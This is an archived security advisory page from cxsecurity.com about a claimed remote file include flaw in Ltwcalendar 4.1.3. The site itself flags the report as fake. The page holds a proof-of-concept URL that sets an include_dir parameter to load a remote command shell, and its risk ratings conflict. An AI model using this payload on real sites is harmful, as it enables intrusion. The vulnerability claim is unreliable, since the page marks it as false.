WARNING! Fake news / Uwaga! Nota nieprawdziwa

Ltwcalendar 4.1.3 version - Remote File Include Vulnerabilities

2006.06.18
Risk: Medium
Local: No
Remote: Yes
CWE: CWE-Other


Ogólna skala CVSS: 7.5/10
Znaczenie: 6.4/10
Łatwość wykorzystania: 10/10
Wymagany dostęp: Zdalny
Złożoność ataku: Niska
Autoryzacja: Nie wymagana
Wpływ na poufność: Częściowy
Wpływ na integralność: Częściowy
Wpływ na dostępność: Częściowy

# SaVSaK.CoM | SpC-x - The_BeKiR | # Ltwcalendar 4.1.3 version - Remote File Include Vulnerabilities # Risk : High # Class: Remote # Script : Ltwcalendar # Credits : SpC-x # Thanks : The_BeKiR - Ejder - FasTBoY - ERNE - RMx # Code : # require_once('./private/ltw_config.php'); require_once($ltw_config['include_dir'].'/ltw_classes.php'); # Vulnerable : # http://www.victim.com/Ltwcalendar/calendar.php?ltw_config[include_dir]=C ommand-Shell


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2022, cxsecurity.com

 

Back to Top